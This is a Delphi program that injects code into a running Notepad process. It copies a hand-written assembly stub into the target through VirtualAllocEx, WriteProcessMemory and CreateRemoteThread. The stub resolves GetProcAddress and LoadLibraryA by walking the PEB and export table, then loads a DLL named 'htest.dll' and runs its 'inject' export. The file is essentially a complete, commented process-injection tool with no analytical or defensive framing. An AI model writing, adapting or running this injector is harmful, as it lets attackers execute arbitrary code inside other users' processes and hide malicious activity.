program ProcessInject;
uses
SysUtils,
windows,
classes,
TLHelp32;
var
size:integer;                     // byte length of the injected stub: @procend - @mainproc (+1), see the main block
phandle:thandle;                  // handle to the target process returned by OpenProcess
bytes,pid,tid:dword;              // bytes written by WriteProcessMemory / target process id / remote thread id
newmodule:pointer;                // address of the stub inside the target process (VirtualAllocEx result)
ContinueLoop:BOOL;                // result of Process32First/Process32Next while enumerating the snapshot
FSnapshotHandle:THandle;          // Toolhelp32 process snapshot handle
FProcessEntry32:TProcessEntry32;  // entry currently read from the snapshot
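procedure mainproc;
// Injected stub. It is never called in this process: the main block copies
// its raw bytes (up to @procend) into the target and starts them with
// CreateRemoteThread. It therefore holds only position-independent code,
// resolves kernel32 and GetProcAddress by hand, then does
// LoadLibraryA("htest.dll") and calls that DLL's "inject" export.
// Every lookup result is checked so a missing DLL or export makes the
// remote thread return quietly instead of crashing the host process.
// Register roles after the prologue: ebp = scratch frame, edi = kernel32
// base. Frame slots: [ebp+$10] kernel32 base, [ebp+$14] GetProcAddress,
// [ebp+$18] LoadLibraryA.
begin
  asm
    // prologue: preserve callee-saved registers, carve a 100-byte scratch frame
    push ebp
    push esi
    push edi
    push ebx
    sub  esp,$00000064
    mov  ebp,esp
    // kernel32 base via the PEB loader list
    mov  eax,fs:$30           // TEB.ProcessEnvironmentBlock
    mov  eax,[eax+$0c]        // PEB.Ldr (PEB_LDR_DATA)
    mov  esi,[eax+$1c]        // Ldr.InInitializationOrderModuleList.Flink (1st entry)
    lodsd                     // eax = links of the 2nd entry
    mov  edi,[eax+$08]        // DllBase of the 2nd module in initialization order
    // NOTE(review): assumes that 2nd module is kernel32.dll (true on older
    // Windows); on newer versions kernelbase.dll precedes it — confirm per target OS.
    // walk kernel32's export name table for "GetProcAddress"
    mov  eax,[edi+$3c]        // IMAGE_DOS_HEADER.e_lfanew
    mov  edx,[edi+eax+$78]    // OptionalHeader.DataDirectory[EXPORT].VirtualAddress
    add  edx,edi              // edx = IMAGE_EXPORT_DIRECTORY
    mov  ecx,[edx+$18]        // NumberOfNames
    mov  ebx,[edx+$20]        // AddressOfNames (RVA)
    add  ebx,edi
@@search:
    test ecx,ecx
    jz   @@done               // table exhausted: bail out instead of reading before it
    dec  ecx
    mov  esi,[ebx+ecx*4]      // RVA of name[ecx]
    add  esi,edi
    mov  eax,$50746547        // "GetP"
    cmp  [esi],eax
    jne  @@search
    mov  eax,$41636f72        // "rocA"
    cmp  [esi+4],eax
    jne  @@search
    mov  eax,$65726464        // "ddre"
    cmp  [esi+8],eax
    jne  @@search
    cmp  word ptr [esi+12],$7373  // "ss"
    jne  @@search
    cmp  byte ptr [esi+14],0      // full-name match only (rejects e.g. GetProcAddressForCaller)
    jne  @@search
    // name index -> ordinal -> function RVA. The PE format requires the
    // AddressOfNameOrdinals hop; indexing AddressOfFunctions by name index is wrong.
    mov  eax,[edx+$24]        // AddressOfNameOrdinals (RVA)
    add  eax,edi
    movzx ecx,word ptr [eax+ecx*2]
    mov  eax,[edx+$1c]        // AddressOfFunctions (RVA)
    add  eax,edi
    mov  eax,[eax+ecx*4]
    add  eax,edi              // eax = GetProcAddress
    mov  [ebp+$14],eax
    mov  [ebp+$10],edi
    // LoadLibraryA = GetProcAddress(kernel32, "LoadLibraryA")
    push $0
    push $41797261            // "aryA"
    push $7262694c            // "Libr"
    push $64616f4c            // "Load"
    push esp                  // lpProcName (string just pushed)
    push [ebp+$10]            // hModule
    call [ebp+$14]
    test eax,eax
    jz   @@done
    mov  [ebp+$18],eax
    // hDll = LoadLibraryA("htest.dll")
    push $0000006c            // "l",0,0,0
    push $6c642e74            // "t.dl"
    push $73657468            // "htes"
    push esp
    call [ebp+$18]
    test eax,eax
    jz   @@done               // DLL not found or failed to load
    // p = GetProcAddress(hDll, "inject"); p()
    push $00007463            // "ct",0,0
    push $656a6e69            // "inje"
    push esp
    push eax                  // hDll
    call [ebp+$14]
    test eax,eax
    jz   @@done               // export missing
    call eax                  // run the payload
@@done:
    // epilogue: drop the frame and any string bytes pushed below it. The
    // payload's calling convention is unknown, so esp is restored from ebp.
    mov  esp,ebp
    add  esp,$00000064
    pop  ebx
    pop  edi
    pop  esi
    pop  ebp
  end;
end;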
procedure procend; // end marker only: the main block uses @procend - @mainproc as the stub length, so this must stay directly after mainproc
begin
end;
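var
hthread:THandle; // remote thread handle; released as soon as the thread is started
oldprot:DWORD;   // previous page protection, required by VirtualProtectEx
begin
// Locate the target: the first process whose image name is NOTEPAD.EXE.
pid:=0;
FSnapshotHandle:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if FSnapshotHandle=INVALID_HANDLE_VALUE then exit; // snapshot failed, nothing to enumerate
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
ContinueLoop:=Process32First(FSnapshotHandle,FProcessEntry32);
while integer(ContinueLoop)<>0 do
begin
  if uppercase(FProcessEntry32.szExeFile)='NOTEPAD.EXE' then
  begin
    pid:=fprocessentry32.th32ProcessID;
    break;
  end;
  ContinueLoop:=Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
if pid=0 then exit; // target process not running
// Least privilege: request only the rights VirtualAllocEx / WriteProcessMemory /
// VirtualProtectEx / CreateRemoteThread need, not PROCESS_ALL_ACCESS.
phandle:=openprocess(PROCESS_CREATE_THREAD or PROCESS_QUERY_INFORMATION or
  PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_VM_READ,false,pid);
if phandle=0 then exit;
try
  // Stub length is the distance to the following procedure. This relies on the
  // linker placing procend directly after mainproc and on mainproc being
  // position independent (no absolute addresses or data references).
  size:=dword(@procend)-dword(@mainproc)+1;
  // Allocate writable first and grant execute only after the copy, so the
  // region is never writable and executable at the same time (W^X).
  newmodule:=VirtualAllocEx(phandle,nil,size,MEM_COMMIT or MEM_RESERVE,PAGE_READWRITE);
  if newmodule=nil then exit;
  if (not writeprocessmemory(phandle,newmodule,@mainproc,size,bytes)) or (bytes<>dword(size)) then
  begin
    VirtualFreeEx(phandle,newmodule,0,MEM_RELEASE); // partial/failed copy: do not run it
    exit;
  end;
  if not VirtualProtectEx(phandle,newmodule,size,PAGE_EXECUTE_READ,oldprot) then
  begin
    VirtualFreeEx(phandle,newmodule,0,MEM_RELEASE);
    exit;
  end;
  FlushInstructionCache(phandle,newmodule,size); // freshly written code must not be served from stale cache lines
  hthread:=createremotethread(phandle,nil,0,newmodule,nil,0,tid);
  if hthread=0 then
  begin
    VirtualFreeEx(phandle,newmodule,0,MEM_RELEASE);
    exit;
  end;
  // The stub memory stays mapped because the remote thread is executing it and
  // we do not wait for it; only our own handle is released.
  CloseHandle(hthread);
finally
  CloseHandle(phandle);
end;
end.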